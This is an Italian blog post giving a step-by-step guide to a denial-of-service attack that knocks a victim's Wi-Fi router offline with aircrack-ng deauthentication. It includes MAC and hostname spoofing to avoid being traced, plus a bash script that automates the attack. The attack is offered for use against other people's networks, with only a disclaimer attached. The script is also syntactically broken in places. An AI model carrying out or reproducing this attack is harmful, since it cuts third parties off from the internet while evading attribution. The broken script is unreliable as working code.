Come eseguire un attacco dos Router

ESEGUIRE ATTACCO DoS ROUTER CON Aircrack SENZA CONOSCERE LA PASSWORD

Requisiti necessari:
-Una distribuzione Linux basata su Debian
-airmon-ng
-airodump-ng
-aireplay-ng
Requisiti consigliati:
-macchanger

 

Vagando per Internet ho notato che esistono molte versioni per eseguire attacchi DoS attraverso aircrack. I vantaggi di usare aircrack sono la semplicità d’ utilizzo, la possibilità di avere tutti i tools già installati (es: Kali Linux) e soprattutto non è necessario conoscere la password della vittima.
Ecco come dossare il router (Ricordo che attaccare routers altrui è un reato perseguibile penalmente e non mi assumo alcuna responsabilità di atti ispirati da questa guida):

 

GUIDA SPIEGATA:
Se desiderate una guida meno esaustiva saltate questo paragrafo e leggete “guida veloce”.
Prima di tutto, anche se non è necessario, è preferibile spooffare i dati sensibili del pc, che sono l’ hostname e il mac address:
se siete connessi ad una rete, dovete disconnettervi digitando sul terminale:
-ifconfig wlan0 down (se la connessione è via wireless)
-ifconfig eth0 down (se la connessione è via cavo)
A questo punto dovete cambiare l’ hostname digitando:
-hostname nuovonome (se non si vuole essere rintracciati, ad esempio, si può mettere un nome di una marca di un altro pc: se possedete un Acer potete mettere “Asus” come hostname).
Adesso cambiate mac address:
-macchanger -r wlan0 (se la connessione è via wireless)
-macchanger -r eth0 (se la connessione è via cavo)
Ora fino al riavvio del pc il computer manterrà l’ hostname e il mac falso.
Adesso bisogna “captare” le reti disponibili (se si è connessi via cavo bisogna seguire lo stesso procedimento scrivendo eth0 al posto di wlan0):
-airmon-ng start wlan0
-airodump-ng wlan0mon
A questo punto compariranno tutte le reti nelle vicinanze, quando vedete il nome della rete della vostra vittima premete ctrl+c e scrivete:
-airodump-ng -c CH —bssid BSSID wlan0mon (al posti di CH bisogna scrivere il nome del canale che trovate sotto la colonna ch; al posto di BSSID dovete scrivere il bssid che trovate sotto la colonna bssid al fianco del nome del nome della rete della vittima)
Orami il gioco è fatto: premete crtl+c e digitate:
-aireplay-ng -0 1000 -a BSSID —ignore-negative-one wlan0mon (al posti di BSSID inserite lo stesso bssid di prima)
Non appena premerete invio verrà attivato un attacco DoS al router che bloccherà l’ accesso a Internet a tutti i dispositivi ad esso collegati; per stoppare l’ attacco premere ctrl+c.

 

GUIDA VELOCE:
Se volete eseguire l’ operazione tramite cavo digitate eth0 al posto di wlan0.
-ifconfig wlan0 down
-hostname quellochevuoi
-macchanger -r wlan0
-airmon-ng start wlan0
-airodump-ng wlan0mon
-airodump-ng -c CH —bssid BSSID wlan0mon
-aireplay-ng -0 1000 -a BSSID —ignore-negative-one wlan0mon

 

CREARE UN PROGRAMMA PER ESEGUIRE ATTACCHI VELOCI:
Se siete stanchi di eseguire sempre il solito procedimento per dossare routers c’ è un metodo più veloce per farlo: creare un programma!
Dal terminale andate nella cartella in cui desiderate creare il programma e digitate:
-nano dossatore.sh
Adesso incollate questo:

#!/bin/bash
echo “1)wlan0 2)eth0”
read metodo
if metodo=1; then
ifconfig wlan0 down
echo “hostname?”
read nome
hostname $nome
macchanger -r wlan0
airmon-ng start wlan0
airodump-ng wlan0mon
echo “inserisci BSSID: ”
read BSSID
echo “inserisci CHANNEL”
read CHANNEL
airodump-ng -c $CHANNEL —bssid $BSSID wlan0mon
aireplay-ng -0 1000 -a $BSSID —ignore-negative-one wlan0mon
fi
elif metodo=2; then
ifconfig eth0 down
echo “hostname?”
read nome
hostname $nome
macchanger -r eth0
airmon-ng start eth0
airodump-ng eth0mon
echo “inserisci BSSID: ”
read BSSID
echo “inserisci CHANNEL”
read CHANNEL
airodump-ng -c $CHANNEL —bssid $BSSID eth0mon
aireplay-ng -0 1000 -a $BSSID —ignore-negative-one eth0mon
fi
Premete ctrl+o
Premete ctrl+x
Nella cartella in cui avete creato il programma digitate:
-chmod +rx dossatore.sh
Hai creato il programma! Per eseguirlo scrivi:
./dossatore.sh
Per utilizzare il programma basta scrivere quel che è rischiesto (il nuovo nome del mac, il bssid…) e premere ctrl+c negli stessi momenti in cui si deve fare nei processi spiegati sopra.

NON MI ASSUMO NESSUNA RESPONSABILITÀ.

 

Grazie per il tempo dedicato alla lettura di questo articolo.

Paolo

Annunci

Rispondi

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione /  Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione /  Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione /  Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione /  Modifica )

w

Connessione a %s...

Create a website or blog at WordPress.com

Su ↑

%d blogger hanno fatto clic su Mi Piace per questo: